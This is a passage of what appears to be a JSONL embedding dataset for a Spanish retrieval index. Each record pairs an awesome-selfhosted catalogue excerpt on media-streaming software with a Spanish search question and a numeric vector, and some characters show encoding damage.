0.06173, -0.0822, -0.08083, -0.11452, -0.02413, 0.0445, -0.10829, -0.00594, -0.16075, -0.00467, -0.16158, -0.03145, -0.05751, 0.01375, -0.03056, -0.03872, -0.08164, 0.19745, 0.02351, -0.09084, 0.05153, -0.16325, -0.05592, -0.03572, -0.00098, 0.09544, 0.03862, -0.01124, -0.01157, -0.01958, -0.01746, -0.0084, -0.06432, 0.08009, 0.02627, 0.15736, 0.01705, 0.12814, -0.03909, 0.04185, -0.01691, -0.00921, 0.06831, 0.00343, -0.09282, 0.03852, 0.02303, -0.05686, -0.02061, -0.07047, -0.01808, -0.01227, 0.09806, 0.1151, -0.0187, 0.00509, -0.21498, -0.0739, 0.0285, -0.02757, 0.02348, 0.09049, -0.0286, -0.02252, 0.06536, -0.00391, 0.08443, 0.01671, 0.05441, 0.01969, -0.0549, 0.00213, -0.0077, -0.17407, -0.00806, -0.08295, -0.11615, -0.0381, -0.02984, 0.04116, -0.0878, -0.01906, 0.06412, -0.03563, -0.00911, 0.03953, -0.09693, -0.00459, -0.0788, 0.0295, 0.06398, 0.06738, 0.15984, 0.08059, -0.11235, 0.13765, 0.11576, 0.03795, 0.04134, 0.08216, -0.01141, -0.06829, 0.00191, 0.01115, 0.02485, 0.05241, 0.05639, -0.1906, 0.04718, 0.01885, 0.08551, -0.05373, 0.01445, -0.05546, -0.02959, -0.07638, 0.00627, 0.05366, -0.00637, -0.06875, -0.00578, -0.02663, -0.06281, -0.01367, -0.05857, 0.05451, 0.03251, -0.09834, 0.12891, 0.03248, -0.03912, -0.03493, -0.05827, -0.01726, -0.07308, 0.05655, -0.00434, -0.00329, -0.06868, 0.06307, 0.04223, 0.09455, 0.01559, -0.00039, -0.06194, -0.035, 0.01541, -0.03691, 0.0564, -0.08129, 0.00315, -0.02295, 0.01742, -0.03071, -0.0022, -0.03129, 0.02712, -0.08922, 0.03886, -0.01072, -0.03099, -0.04168, -0.10227, -0.02086, 0.03496, 0.06587, 0.05916, -0.07175, 0.09673, -0.01865, 0.13637, 0.06779, -0.08766, -0.04522, -0.05237, 0.04753, -0.11492, -0.00846, -0.05228, -0.05386, 0.02833, -0.03736, 0.01952, 0.0087, -0.01425, -0.04036, 0.08446, -0.00705, -0.0429, -0.11986, -0.05389, -0.05915, -0.00905, -0.03676, -0.0167, -0.02506, -0.0489, 0.05512, 0.01296, -0.0698, -0.05754, 0.0775, 0.00987, -0.01823, 0.05236, -0.00943, -0.03286, 0.0372, 0.09012, -0.00348, -0.01283, 0.05122, 0.05716, -0.00365, 0.02673, -0.00022, 0.03299, 0.06559, 0.08216, 0.04132, 0.03004, -0.03647, -0.01208, -0.01449, 0.01071, 0.02964, 0.01892, -0.03253, 0.00089, -0.02356, -0.10796, 0.05171, 0.04814, 0.04287, -0.01322, -0.02903, 0.03271, 0.03934, -0.04379, -0.02728, 0.09045, -0.00824, 0.02315, -0.04022, 0.00711, -0.06419, 0.02715, 0.05029, 0.00905, -0.00495, 0.04573, 0.00914, -0.00071, -0.00956, 0.08786]} -{"tipo": "pregunta", "herramienta": "Media Streaming - Multimedia Streaming", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Streaming - Multimedia Streaming", "tema": "media streaming - multimedia streaming", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Streaming - Multimedia Streaming: ClipBucket β€” Start your own video sharing website (YouTube/Netflix Clone) in a matter of minutes [AAL, Docker/PHP]. cmyflix β€” Minimalist Plex/Jellyfin alternative to stream video [AGPL-3.0, C/deb]. Gerbera β€” UPnP Media Server, which allows you to stream your digital media throughout your home network and listen to/watch it on a variety of UPnP compatible devices [GPL-2.0, Docker/deb/C++]. Icecast 2 β€” Streaming audio/video server which can be used to create an Internet radio station or a privately running jukebox and many things in between [GPL-2.0, C]. Jellyfin β€” Media server for audio, video, books, comics, and photos with a sleek interface and robust transcoding capabilities. Almost all modern platforms have clients, including Roku, Android TV, iOS, and Kodi [GPL-2.0, C#/deb/Docker].", "indexar": "cual herramienta sirve para crear mi propia web de compartir videos tipo YouTube?", "v": [-0.04512, 0.0787, -0.14219, -0.11326, -0.00955, -0.11592, -0.06638, -0.02649, 0.07316, -0.19043, -0.07, -0.11745, 0.02898, -0.08263, -0.04136, -0.03073, 0.1568, -0.13092, 0.12943, -0.06168, 0.0473, 0.04937, -0.08881, -0.08817, -0.11421, -0.09969, 0.03186, -0.04517, -0.1162, 0.05173, -0.01334, 0.13113, -0.07573, 0.01921, -0.12061, -0.04489, 0.05249, 0.06255, -0.10095, 0.03748, -0.03214, 0.0409, -0.11713, 0.12601, -0.02414, 0.06439, 0.01314, -0.0539, -0.08735, 0.08166, 0.03179, -0.00913, -0.17802, 0.01548, -0.03241, -0.08804, 0.16886, -0.20446, -0.02637, -0.07035, -0.10756, -0.0997, -0.00107, -0.02619, -0.0355, -0.03232, -0.03866, 0.06147, -0.06233, 0.06761, -0.06903, -0.013, 0.01263, -0.03204, 0.09725, 0.05316, -0.02049, 0.03333, -0.03932, -0.03766, 0.0735, -0.07971, -0.03266, -0.00576, -0.02902, -0.07753, 0.02844, -0.03594, 0.0172, -0.15457, -0.02656, 0.1049, 0.01709, -0.02686, -0.08756, -0.04673, 0.09572, -0.02936, -0.01899, -0.10845, 0.05081, -0.05874, -0.05346, 0.03974, 0.0449, 0.08184, 0.01564, -0.05196, -0.08024, 0.01191, 0.11354, 0.04567, -0.03323, -0.04609, 0.00317, 0.06525, -0.06982, -0.03044, 0.02297, -0.03014, 0.08574, 0.00479, -0.10966, -0.07551, -0.02223, 0.06545, -0.04238, 0.04933, -0.02396, -0.00742, -0.00149, -0.06314, -0.02625, -0.01467, 0.04675, 0.00704, 0.05732, -0.06539, -0.06635, -0.08381, 0.07088, -0.0134, -0.0568, -0.1171, 0.01894, -0.01595, 0.0616, -0.08615, -0.09505, 0.03288, -0.0623, -0.02148, -0.05816, -0.08011, -0.06535, 0.01368, -0.05854, -0.05576, -0.10866, 0.00398, 0.03299, -0.02076, 0.03847, -0.05195, -0.02021, 0.02612, -0.05533, 0.04105, 0.02932, 0.02028, 0.01124, 0.04284, 0.02094, -0.05543, 0.00362, -0.06466, -0.05246, -0.01153, 0.04899, -0.02485, -0.06213, 0.00464, -0.0297, 0.0483, -0.0164, -0.10937, -0.00124, 0.01664, -0.03831, 0.07245, -0.05508, -0.03842, -0.02239, -0.00748, 0.0369, -0.02201, -0.06518, -0.10569, 0.04775, 0.01554, -0.0354, -0.05612, -0.01633, -0.02046, -0.06213, 0.0033, -0.01703, -0.05704, 0.01123, -0.00715, 0.01057, -0.01867, -0.00761, -0.04222, 0.02534, -0.01302, 0.08059, 0.01614, 0.01491, -0.01107, 0.0468, 0.00077, -0.00128, -0.04336, -0.0003, 0.11147, 0.02882, -0.0231, -0.04459, -0.02478, -0.03087, -0.06048, -0.03409, -0.05071, 0.04376, -0.03662, 0.05299, 0.002, -0.0361, 0.00698, -0.01326, 0.04096, -0.00636, -0.01146, -0.02351, -0.06027, -0.05158, 0.02872, -0.00986, -0.1013, -0.01125, 0.00208, 0.05142, 0.01823, -0.00495, 0.00956]} -{"tipo": "pregunta", "herramienta": "Media Streaming - Multimedia Streaming", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Streaming - Multimedia Streaming", "tema": "media streaming - multimedia streaming", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Streaming - Multimedia Streaming: ClipBucket β€” Start your own video sharing website (YouTube/Netflix Clone) in a matter of minutes [AAL, Docker/PHP]. cmyflix β€” Minimalist Plex/Jellyfin alternative to stream video [AGPL-3.0, C/deb]. Gerbera β€” UPnP Media Server, which allows you to stream your digital media throughout your home network and listen to/watch it on a variety of UPnP compatible devices [GPL-2.0, Docker/deb/C++]. Icecast 2 β€” Streaming audio/video server which can be used to create an Internet radio station or a privately running jukebox and many things in between [GPL-2.0, C]. Jellyfin β€” Media server for audio, video, books, comics, and photos with a sleek interface and robust transcoding capabilities. Almost all modern platforms have clients, including Roku, Android TV, iOS, and Kodi [GPL-2.0, C#/deb/Docker].", "indexar": "con que puedo montar un servidor de radio online propio?", "v": [0.03333, 0.06699, -0.13843, -0.14249, -0.20774, -0.03407, 0.05417, -0.01233, -0.06238, -0.095, 0.01612, -0.03552, 0.20861, -0.10207, 0.08204, 0.09069, 0.14995, -0.03283, 0.05401, 0.0374, 0.00402, 0.00921, 0.08329, -0.04351, 0.02858, 0.03426, 0.04899, -0.08232, -0.07553, 0.04026, 0.05518, 0.08007, 0.0582, 0.02929, 0.00154, -0.1012, 0.03961, 0.21478, -0.00724, 0.04085, 0.06903, -0.04073, -0.04662, 0.09995, 0.01454, 0.03106, 0.02979, -0.1581, 0.03519, 0.02645, 0.04087, -0.12548, -0.04166, -0.03428, -0.02939, -0.0534, 0.13354, -0.15385, 0.11807, -0.07532, -0.08019, 0.04394, 0.00868, -0.02532, 0.02136, 0.01156, -0.03879, 0.04239, -0.12917, -0.08379, -0.08802, -0.04537, -0.00539, -0.05077, 0.00859, 0.08768, -0.0545, -0.00839, 0.07875, 0.00467, -0.00881, -0.0124, 0.02734, 0.11897, -0.13084, 0.02014, -0.00174, -0.07971, 0.05183, 0.03044, 0.02585, 0.12835, -0.02048, 0.02555, 0.02266, -0.13414, 0.09011, 0.02045, 0.01356, -0.01307, -0.00351, 0.11271, -0.01004, 0.01865, 0.06472, 0.0815, 0.08739, -0.07625, 0.12915, -0.02902, 0.0342, -0.00175, -0.04549, 0.01142, -0.0424, -0.10057, 0.01507, 0.05674, -0.01697, 0.05883, -0.08984, 0.03016, 0.11103, 0.04512, 0.03079, -0.04188, 0.02074, 0.01806, -0.00808, -0.02959, -0.00416, 0.00118, -0.00869, -0.0931, -0.00567, 0.03041, -0.04133, -0.08436, -0.04366, -0.04344, 0.03526, 0.0038, -0.10413, 0.00766, 0.06919, 0.02191, 0.05379, -0.10297, -0.05602, 0.04089, 0.02375, 0.06288, -0.06854, -0.01823, -0.09793, -0.01546, 0.03156, -0.03535, 0.0001, 0.08419, 0.01285, 0.07225, 0.06308, 0.01263, -0.00441, 0.00293, -0.02024, 0.03319, 0.05555, -0.03619, -0.09277, 0.01975, 0.04852, -0.09469, -0.0266, 0.0426, -0.11263, 0.00836, 0.07888, 0.02361, -0.06259, -0.00647, -0.03735, 0.00071, -0.05095, -0.00632, 0.0045, -0.04759, -0.03684, 0.00391, 0.02757, -0.06399, -0.08855, 0.11995, 0.09466, -0.03752, -0.01507, 0.02877, 0.00504, -0.01765, -0.04786, -0.05273, 0.00692, -0.02413, -0.02342, -0.03668, -0.01684, 0.03827, 0.08774, 0.07312, -0.00767, -0.0828, 0.05963, -0.09207, -0.03515, 0.04892, 0.08533, -0.07823, -0.0536, 0.02761, 0.03044, 0.00476, 0.04792, 0.0011, 0.01612, 0.03606, 0.01582, -0.03129, 0.09338, 0.00713, -0.02443, -0.02224, -0.01957, -0.00826, 0.00464, -0.00815, 0.04902, 0.02094, -0.06675, -0.00361, 0.00091, 0.07005, -0.00402, -0.03104, 0.00909, -0.09622, -0.00081, 0.01694, -0.03083, -0.00856, -0.03773, -0.04036, 0.00784, -0.04227, 0.02888, 0.01104]} -{"tipo": "pregunta", "herramienta": "Media Streaming - Multimedia Streaming", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Streaming - Multimedia Streaming", "tema": "media streaming - multimedia streaming", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Streaming - Multimedia Streaming: Karaoke Eternal β€” Host awesome karaoke parties where everyone can easily find and queue songs from their phone's browser. The player is also fully browser-based with support for MP3+G, MP4 and WebGL visualizations [ISC, Docker/Nodejs]. Kodi β€” Multimedia/Entertainment center, formerly known as XBMC. Runs on Android, BSD, Linux, macOS, iOS and Windows [GPL-2.0, C++/deb]. Kyoo β€” Innovative media browser designed for seamless streaming of anime, series and movies, offering advanced features like dynamic transcoding, auto watch history and intelligent metadata retrieval [GPL-3.0, Docker]. MediaMTX β€” Ready-to-use, zero-dependency real-time media server and proxy to publish, read, record, playback and route video/audio streams over SRT, WebRTC, RTSP, RTMP, HLS, MPEG-TS, RTP [MIT, Go/Docker]. Meelo β€” Personal Music Server, designed for collectors and music maniacs [GPL-3.0, Docker]. MistServer β€” Public domain streaming media server that works with any device and any format [Unlicense, C++].", "indexar": "que programa puedo usar para organizar y reproducir mΓΊsica en casa de forma segura", "v": [0.05, 0.10485, -0.17693, -0.10924, 0.00288, -0.06303, -0.1139, -0.03632, -0.11591, -0.17813, -0.06678, -0.07904, 0.10334, -0.0692, 0.00511, -0.05435, 0.09876, -0.06154, -0.0146, 0.07976, 0.00275, -0.01937, -0.07749, -0.00906, -0.03506, -0.05066, 0.16105, -0.00835, -0.0841, 0.02507, 0.0146, 0.08064, 0.08566, -0.09621, -0.11262, 0.02623, 0.02295, -0.0028, 0.02144, -0.05149, -0.1296, 0.03114, -0.05255, 0.05394, 0.0107, 0.03051, 0.08222, -0.03307, -0.05114, -0.04068, 0.00215, -0.0016, -0.02984, -0.01032, 0.05034, -0.16778, -0.0805, -0.18024, -0.02815, -0.00806, -0.01691, -0.02963, 0.05627, 0.11798, 0.0788, 0.03889, 0.03692, 0.01846, 0.00762, 0.00738, -0.07696, 0.01732, 0.00177, 0.05271, -0.04403, 0.07622, -0.07284, -0.11441, 0.00838, 0.00036, -0.08361, -0.02676, -0.03176, 0.07097, -0.07257, -0.0423, 0.06272, -0.01094, -0.01967, -0.04411, -0.03276, 0.00266, 0.06855, 0.09074, 0.07305, -0.11453, 0.14684, 0.0887, 0.04215, 0.01142, 0.04397, -0.10629, -0.02555, 0.09747, -0.03153, 0.05798, 0.11927, -0.00651, 0.06295, 0.0052, -0.08971, 0.08867, -0.11001, 0.00435, -0.0557, -0.02588, -0.03949, -0.03075, 0.08896, -0.02782, -0.00635, 0.07468, 0.02822, -0.02365, 0.03781, -0.04632, 0.05174, 0.09934, -0.03099, 0.04, 0.01161, -0.01243, -0.03613, -0.00639, 0.00632, -0.04471, -0.04862, -0.11116, 0.06372, -0.01844, 0.08066, 0.11652, -0.03324, -0.06075, 0.07454, -0.01986, 0.0051, -0.01558, -0.06557, 0.06965, -0.02171, 0.10264, -0.07866, -0.00751, -0.0455, 0.05955, 0.04468, -0.06009, -0.02689, -0.02936, -0.09522, 0.07771, -0.02062, -0.05919, 0.04801, 0.03457, 0.11384, 0.03967, 0.00107, 0.01119, -0.07945, 0.04555, 0.08524, -0.09321, -0.11308, -0.11502, -0.04999, -0.09843, 0.0628, -0.01809, -0.03468, 0.05138, -0.0527, -0.02062, 0.02664, 0.0017, 0.00628, 0.07948, -0.06038, -0.02839, -0.03115, -0.01256, -0.01651, 0.04293, 0.001, -0.03526, -0.09441, 0.00701, -0.01163, 0.04384, -0.07612, -0.09597, 0.02066, -0.02625, 0.12552, 0.01667, -0.08503, 0.00745, 0.04237, 0.0737, 0.01396, -0.06879, 0.05076, 0.06784, -0.08806, -0.0099, -0.06038, 0.0104, 0.03287, 0.09063, -0.00864, 0.05565, 0.0061, -9e-05, 0.00264, -0.05763, 0.01704, -0.03374, 0.08397, 0.06489, -0.02425, -0.00157, 0.02108, 0.01721, 0.00121, 0.00116, -0.05848, -0.06493, -0.03551, -0.02699, -0.01474, 0.08574, -0.00825, 0.008, -0.01189, -0.04394, -0.06002, 0.06244, -0.00228, -0.00684, 0.00586, 0.03911, 0.08358, -0.00495, 0.01004, 0.04947]} -{"tipo": "pregunta", "herramienta": "Media Streaming - Multimedia Streaming", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Streaming - Multimedia Streaming", "tema": "media streaming - multimedia streaming", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Streaming - Multimedia Streaming: Karaoke Eternal β€” Host awesome karaoke parties where everyone can easily find and queue songs from their phone's browser. The player is also fully browser-based with support for MP3+G, MP4 and WebGL visualizations [ISC, Docker/Nodejs]. Kodi β€” Multimedia/Entertainment center, formerly known as XBMC. Runs on Android, BSD, Linux, macOS, iOS and Windows [GPL-2.0, C++/deb]. Kyoo β€” Innovative media browser designed for seamless streaming of anime, series and movies, offering advanced features like dynamic transcoding, auto watch history and intelligent metadata retrieval [GPL-3.0, Docker]. MediaMTX β€” Ready-to-use, zero-dependency real-time media server and proxy to publish, read, record, playback and route video/audio streams over SRT, WebRTC, RTSP, RTMP, HLS, MPEG-TS, RTP [MIT, Go/Docker]. Meelo β€” Personal Music Server, designed for collectors and music maniacs [GPL-3.0, Docker]. MistServer β€” Public domain streaming media server that works with any device and any format [Unlicense, C++].", "indexar": "con que herramienta montarΓ­a un servidor de karaoke con visualizaciones web", "v": [-0.04649, -0.07133, -0.23985, -0.12215, -0.10513, -0.15679, -0.06934, -0.01705, 0.12297, -0.15026, -0.01312, -0.13115, 0.03403, -0.05051, 0.07651, 0.19619, 0.20004, -0.12828, 0.00822, 0.09884, 0.03211, 0.038, -0.0238, -0.00202, -0.09562, 0.01811, 0.07263, -0.03976, -0.10668, -0.01434, 0.00516, -0.0029, -0.00111, 0.0097, -0.06026, -0.15124, 0.01637, 0.10561, -0.02479, 0.01901, -0.0504, 0.01643, -0.06014, 0.08055, -0.01441, 0.00232, 0.01772, -0.03898, 0.0126, 0.09459, 0.00106, -0.07344, -0.14843, 0.06504, 0.04219, -0.16159, 0.19592, -0.14821, 0.06173, -0.11472, -0.14716, 0.05419, -0.08094, -0.06608, 0.02545, 0.07506, 0.03392, -0.03507, -0.09607, -0.00226, -0.05352, -0.02945, 0.05386, -0.02503, 0.05641, 0.07463, -0.04112, -0.01593, 0.00536, -0.01355, 0.0638, -0.02366, -0.04471, 0.10417, -0.14313, -0.07827, 0.01704, -0.017, 0.06761, -0.04245, 0.04502, 0.09955, -0.05562, 0.02308, -0.01915, -0.0135, 0.09857, -0.06365, -0.05244, -0.04758, 0.09211, -0.04211, -0.05944, 0.05294, 0.06177, 0.03658, 0.09507, -0.0698, -0.02188, -0.02851, 0.06934, 0.00785, -0.04578, 0.00907, -0.06426, -0.06978, 0.0281, 0.00805, 0.06196, -0.01278, 0.0391, 0.02838, -0.03023, 0.01547, 0.01487, -0.0629, 0.06433, 0.07632, -0.03293, -0.10216, 0.01252, -0.03488, -0.07434, -0.01041, 0.00408, 0.01643, 0.06778, -0.1449, -0.02441, -0.0217, -0.03905, 0.01039, -0.0333, -0.02753, 0.0722, -0.01708, 0.0569, -0.08666, -0.10777, 0.05785, 0.01036, -0.03488, -0.06642, -0.04677, -0.11717, 0.01672, -0.05575, -0.01147, -0.05359, 0.01326, -0.00293, -0.00512, 0.08309, 0.10374, 0.00485, -0.01295, -0.0327, 0.07663, 0.07668, 0.02713, -0.00192, 0.0106, -0.00226, 0.0003, 0.0035, -0.03979, -0.1017, -0.02296, -0.0129, -0.03254, -0.06181, -0.00551, -0.02262, -0.00161, -0.01699, -0.06058, 0.02012, -0.0141, -0.04312, -0.0155, 0.01844, 0.01124, -0.0419, 0.00129, 0.09415, -0.0181, -0.04035, -0.05056, -0.00286, -0.05119, -0.0518, -0.0783, -0.00265, -0.08163, -0.02018, 0.02769, 0.00805, 0.04246, -0.02506, 0.02577, -0.00858, -0.02405, 0.02194, -0.02839, -0.00544, -0.01501, 0.05115, -0.0179, -0.04235, -0.02571, 0.02742, -0.01411, 0.00626, 0.02889, -0.00965, 0.02601, 0.02555, 0.03601, 0.01472, 0.00499, -0.04659, -0.01906, -0.01982, -0.00201, 0.01886, -0.03323, 0.00083, -0.03178, -0.05989, -0.04985, -0.00851, 0.05956, 0.01848, -0.01069, -0.04386, -0.06136, -0.01172, -0.03124, -0.03253, -0.06443, 0.01156, -0.0333, 0.00471, -0.04382, 0.00152, -0.01854]} -{"tipo": "pregunta", "herramienta": "Media Streaming - Multimedia Streaming", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Streaming - Multimedia Streaming", "tema": "media streaming - multimedia streaming", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Streaming - Multimedia Streaming: Karaoke Eternal β€” Host awesome karaoke parties where everyone can easily find and queue songs from their phone's browser. The player is also fully browser-based with support for MP3+G, MP4 and WebGL visualizations [ISC, Docker/Nodejs]. Kodi β€” Multimedia/Entertainment center, formerly known as XBMC. Runs on Android, BSD, Linux, macOS, iOS and Windows [GPL-2.0, C++/deb]. Kyoo β€” Innovative media browser designed for seamless streaming of anime, series and movies, offering advanced features like dynamic transcoding, auto watch history and intelligent metadata retrieval [GPL-3.0, Docker]. MediaMTX β€” Ready-to-use, zero-dependency real-time media server and proxy to publish, read, record, playback and route video/audio streams over SRT, WebRTC, RTSP, RTMP, HLS, MPEG-TS, RTP [MIT, Go/Docker]. Meelo β€” Personal Music Server, designed for collectors and music maniacs [GPL-3.0, Docker]. MistServer β€” Public domain streaming media server that works with any device and any format [Unlicense, C++].", "indexar": "cual es la mejor opcion libre para transmitir video y audio a diferentes dispositivos", "v": [0.03281, 0.13524, -0.13485, -0.09604, -0.00973, -0.1017, -0.04764, -0.03904, -0.01881, -0.11587, -0.01961, -0.19803, -0.07601, 0.01717, 0.03773, -0.04357, 0.1549, -0.02601, 0.0744, -0.02448, 0.04423, 0.03177, -0.11562, -0.12866, 0.04332, 0.08738, 0.11022, 0.04901, -0.14758, -0.03021, 0.04383, -0.00995, 0.07925, -0.05002, -0.06838, -0.0329, -0.01385, 0.13164, -0.01657, 0.07928, -0.0476, 0.0138, 0.01061, 0.05602, 0.07147, -0.07829, -0.03244, 0.0713, -0.05139, 0.02622, 0.00033, 0.07307, -0.06346, -0.00052, -0.06196, -0.0761, 0.07836, -0.18143, 0.08395, -0.03897, 0.03996, -0.04502, -0.00861, -0.11203, 0.01453, 0.10549, -0.07329, 0.08034, -0.03483, 0.0263, -0.01492, -0.05779, 0.06425, 0.16359, -0.01607, 0.15705, -0.15686, -0.03012, 0.01459, 0.02386, 0.07367, -0.05953, 0.02212, 0.03063, -0.06204, 0.08101, 0.04201, 0.01047, -0.00599, -0.07493, 0.05105, 0.04581, 0.07906, -0.06392, 0.04512, -0.12767, 0.02806, 0.00601, -0.01663, -0.03509, 0.05738, 0.04106, -0.11322, 0.05738, -0.01272, 0.04029, 0.05358, -0.10628, 0.01142, -0.04756, -0.04059, 0.01766, 0.00906, -0.00945, -0.04459, -0.06357, -0.02872, -0.08711, 0.04145, 0.08814, -0.02634, 0.00795, -0.01198, -0.06033, 0.07871, 0.04224, 0.00958, -0.01975, -0.06406, 0.07425, 0.12627, -0.05487, 0.00708, -0.11772, 0.00219, -0.086, 0.10144, 0.00181, -0.03847, -0.01974, 0.05771, 0.05408, -0.00999, -0.03784, 0.04413, -0.03516, 0.03785, -0.01334, 0.00163, -0.00144, -0.06024, 0.02761, -0.04011, -0.08632, 0.00612, 0.06216, 0.02624, -0.10211, -0.06376, 0.11217, 0.0568, -0.00199, -0.01746, -0.03953, -0.00154, -0.01284, -0.0588, 0.06218, -0.00598, -0.06473, -0.02527, 0.02398, 0.05671, -0.08335, -0.11396, -0.06884, 0.00743, -0.0131, 0.09161, -0.08877, -0.02269, 0.06764, -0.0193, -0.00571, 0.05264, -0.03475, -0.03069, -0.04089, -0.05973, 0.00859, 9e-05, 0.02295, -0.04998, 0.01798, 0.09716, -0.06184, -0.07319, -0.12032, -0.08365, 0.08888, -0.08912, -0.04598, 0.03017, -0.04431, 0.0339, 0.02516, 0.00413, 0.0029, 0.04121, 0.06677, 0.0442, -0.02455, 0.04295, 0.00752, -0.04024, 0.04693, 0.03686, 0.05608, -0.04387, 0.00866, 0.09249, 0.0201, 0.03363, -0.07895, -0.01288, 0.0992, 0.01797, 0.02426, -0.03645, -0.0743, -0.00944, 0.03708, -0.01579, -0.02087, 0.01736, 0.06467, 0.00252, 0.03918, -0.03514, -0.03068, 0.00885, 0.0754, -0.02184, 0.00771, -0.04616, -0.02991, -0.08818, 0.02286, -0.01879, -0.10183, -0.00863, 0.04472, 0.04142, 0.0266, 0.00985, -0.01699]} -{"tipo": "pregunta", "herramienta": "Media Streaming - Multimedia Streaming", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Streaming - Multimedia Streaming", "tema": "media streaming - multimedia streaming", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Streaming - Multimedia Streaming: NymphCast β€” Turn your choice of Linux-capable hardware into an audio and video source for a television or powered speakers (alternative to Chromecast) [BSD-3-Clause, C++]. Rygel β€” UPnP AV MediaServer that allows you to easily share audio, video, and pictures. Media player software may use Rygel to become a MediaRenderer that may be controlled remotely by a UPnP or DLNA Controller [LGPL-2.1, C]. Stash β€” A web-based library organizer and player for your adult media stash, with auto-tagging and metadata scraping support [AGPL-3.0, Docker/Go]. Β΅Streamer β€” Lightweight and very quick server to stream MJPEG video from any V4L2 device to the net [GPL-3.0, C/deb]. ΓΌWave β€” Self-hosted collaborative listening platform. Users take turns playing mediaβ€”songs, talks, gameplay videos, or anything elseβ€”from a variety of media sources like YouTube and SoundCloud [⚠, MIT, Nodejs].", "indexar": "quΓ© programa puedo usar para transmitir audio y video desde mi hardware Linux como alternativa a Chromecast?", "v": [-0.06185, 0.08746, -0.13864, -0.18238, -0.0723, -0.15239, -0.10417, 0.08668, -0.06754, -0.11509, -0.08481, -0.15525, -0.08658, -0.03203, 0.06204, -0.04537, 0.09892, -0.06659, 0.04282, -0.0379, -0.0398, 0.00177, -0.18001, -0.09624, 0.00922, 0.06623, 0.03953, -0.07485, -0.04521, -0.05173, -0.04103, 0.03656, 0.09425, 0.0246, -0.08057, -0.07943, 0.02869, 0.03067, 0.08244, 0.17643, 0.07968, -0.04304, 0.0309, 0.04012, -0.00836, -0.14686, 0.0454, -0.07007, -0.00743, -0.09035, -0.03808, 0.04063, -0.11571, 0.01648, 0.0347, -0.04681, 0.05992, -0.20515, 0.00921, -0.07185, -0.00893, -0.0141, 0.00439, -0.04401, 0.01045, 0.10681, -0.08959, 0.00872, -0.17794, 0.10512, -0.08037, 0.00076, -0.02631, 0.06425, 0.00459, 0.09506, -0.14783, 0.02148, 0.09285, -0.06113, 0.06327, -0.04127, 0.07972, 0.04806, -0.11377, -0.05532, 0.0814, 0.01335, -0.00222, 0.00172, 0.03109, 0.06635, 0.06697, 0.02143, 0.10833, -0.08375, 0.103, 0.02819, -0.00025, -0.11154, 0.01351, 0.05039, -0.08464, 0.11895, 0.01025, 0.0405, 0.03602, -0.12829, -0.07305, -0.01275, -0.02725, 0.03042, -0.05325, -0.01632, -0.04235, -0.07325, -0.00444, -0.04548, -0.01363, 0.01103, -0.06672, 0.07435, -0.03532, -0.00995, 0.04631, 0.02888, -0.02463, 0.05542, -0.08631, 0.04693, 0.08144, -0.13824, 0.03395, -0.06303, -0.0301, -0.03275, 0.0443, -0.05274, 0.01047, -0.00028, 0.06355, 0.08647, 0.04126, -0.0091, 0.05858, -0.05468, -0.0001, -0.04754, -0.03156, -0.07801, -0.03396, 0.03081, -0.08133, -0.04786, -0.07126, 0.00089, 0.04595, -0.03092, -0.05629, -0.00277, -0.02845, -0.06732, 0.02527, 0.01599, -0.00645, 0.00262, -0.05885, 0.08801, -0.001, 0.03846, -0.00535, 0.10649, 0.05421, -0.09581, -0.02009, -0.07843, 0.02829, -0.02431, 0.02422, -0.0205, -0.04765, 0.06425, 0.01587, 0.00907, 0.05844, -0.01, -0.0612, 0.02016, -0.08065, -0.00876, -0.03139, 0.02377, -0.00789, -0.00195, -0.00283, -0.02226, -0.07336, -0.07352, -0.06968, 0.04654, -0.11431, 0.04131, -8e-05, -0.04143, 0.03741, 0.01789, -0.02977, -0.01224, 0.03574, 0.07879, 0.03424, 0.0007, 0.02573, 0.03182, 0.03298, 0.04105, 0.03887, 0.09102, 0.00799, 0.04884, 0.06367, -0.00718, 0.01682, -0.0376, -0.0103, -0.0378, 0.02343, 0.02261, -0.02523, -0.02645, 0.01124, -0.00083, -0.0005, 0.01449, -0.01239, 0.00459, -0.0393, 0.01644, -0.01431, -0.02104, -0.03445, 0.07583, -0.01604, -0.04114, -0.03608, -0.01696, -0.04511, 0.04107, -0.01079, -0.05312, 0.00027, 0.01623, 0.01355, -0.04397, -0.02876, 0.07214]} -{"tipo": "pregunta", "herramienta": "Media Streaming - Multimedia Streaming", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Streaming - Multimedia Streaming", "tema": "media streaming - multimedia streaming", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Streaming - Multimedia Streaming: NymphCast β€” Turn your choice of Linux-capable hardware into an audio and video source for a television or powered speakers (alternative to Chromecast) [BSD-3-Clause, C++]. Rygel β€” UPnP AV MediaServer that allows you to easily share audio, video, and pictures. Media player software may use Rygel to become a MediaRenderer that may be controlled remotely by a UPnP or DLNA Controller [LGPL-2.1, C]. Stash β€” A web-based library organizer and player for your adult media stash, with auto-tagging and metadata scraping support [AGPL-3.0, Docker/Go]. Β΅Streamer β€” Lightweight and very quick server to stream MJPEG video from any V4L2 device to the net [GPL-3.0, C/deb]. ΓΌWave β€” Self-hosted collaborative listening platform. Users take turns playing mediaβ€”songs, talks, gameplay videos, or anything elseβ€”from a variety of media sources like YouTube and SoundCloud [⚠, MIT, Nodejs].", "indexar": "cΓ³mo puedo compartir fΓ‘cilmente mis fotos y videos con otros dispositivos usando UPnP o DLNA?", "v": [-0.12143, 0.19552, 